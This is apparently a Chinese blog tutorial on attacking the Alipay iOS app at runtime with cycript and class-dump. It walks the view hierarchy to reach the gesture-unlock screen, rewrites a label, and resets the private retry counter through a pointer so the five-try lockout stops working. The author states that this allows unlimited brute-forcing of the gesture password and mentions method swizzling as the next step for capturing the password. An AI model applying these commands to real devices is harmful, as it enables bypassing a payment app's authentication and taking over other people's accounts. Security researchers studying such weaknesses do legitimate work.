之前僅僅介紹了工具的使用,本文將實踐一下如何利用 cycript 結合 class-dump 結果hack,還要犧牲一下支付寶app。
首先,老套路,取到手勢解鎖介面的View Controller:
1 2 3 4 5 6 7 8 |
cy# var app = [UIApplication sharedApplication] @"<DFApplication: 0x1666c960>" cy# var keyWindow = app.keyWindow @"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x1b047000>; layer = <UIWindowLayer: 0x165d0650>>" cy# var root = keyWindow.rootViewController @"<UINavigationController: 0x179779a0>" cy# var visible = root.visibleViewController @"<GestureUnlockViewController: 0x165de090>" |
然後,對照class-dump-z結果,來分析 GestureUnlockViewController 有什麼利用價值 :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
@interface GestureUnlockViewController : DTViewController <UIAlertViewDelegate, GestureHeadImageViewDelegate> { @private GestureHeadImageView* _headImageView; GestureTipLabel* _tipLabel; GestureInputView* _inputView; DTButton* _forgetButton; DTButton* _changeAccountButton; int _retryCount; UIView* _guideView; id<GestrueViewControllerDelegate> _delegate; } @property(assign, nonatomic) __weak id<GestrueViewControllerDelegate> delegate; -(void).cxx_destruct; -(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation; -(void)headClicked; -(void)gestureInputView:(id)view didFinishWithPassword:(id)password; -(void)gestureInputViewFirstEffectiveTouch:(id)touch; -(void)alertView:(id)view clickedButtonAtIndex:(int)index; -(void)actionChangeAccountToLogin; -(void)actionResetPswBtnClick; -(void)resetCurrentUser; -(void)resetPsw; -(void)viewWillDisappear:(BOOL)view; -(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData; -(void)viewWillAppear:(BOOL)view; -(void)breakFirstRun; -(BOOL)isFirstRun; -(void)guideViewClicked:(id)clicked; -(void)viewDidLoad; -(void)viewWillLayoutSubviews; @end |
目測 _tipLabel 是寫賬戶名和提示操作的label,上篇文章我提到過:@private限制不了keyPath,現在我們來修改一下支付寶登入頁的使用者名稱資訊:
1 |
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"] |
支付寶手勢密碼解鎖有嘗試次數限制,連續錯5次就要重新登入。
我想解除重試解鎖次數的限制,發現了記錄解鎖次數的型別是int,int _retryCount ,這一點讓我很不開心,因為我無法通過KVC來修改其值了。
但是沒有關係,我可以通過指標訪問:
1 2 |
cy# visible->_retryCount = 0 0 |
這樣我就能無限制的用程式暴力破解手勢密碼了,來計算一下有多少種可能呢?
這個數字對我來說有點大,可是對iPhone5的CPU來說就是小菜一碟了~
等一下,密碼格式是什麼呢?
1 |
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password; |
id型別的密碼,很嚴謹,又給hack帶來不少麻煩呀~
不過沒關係,我們可以利用 Method Swizzling 來打出password到底是什麼,不過呢,貌似可以再寫一篇新文章去介紹了……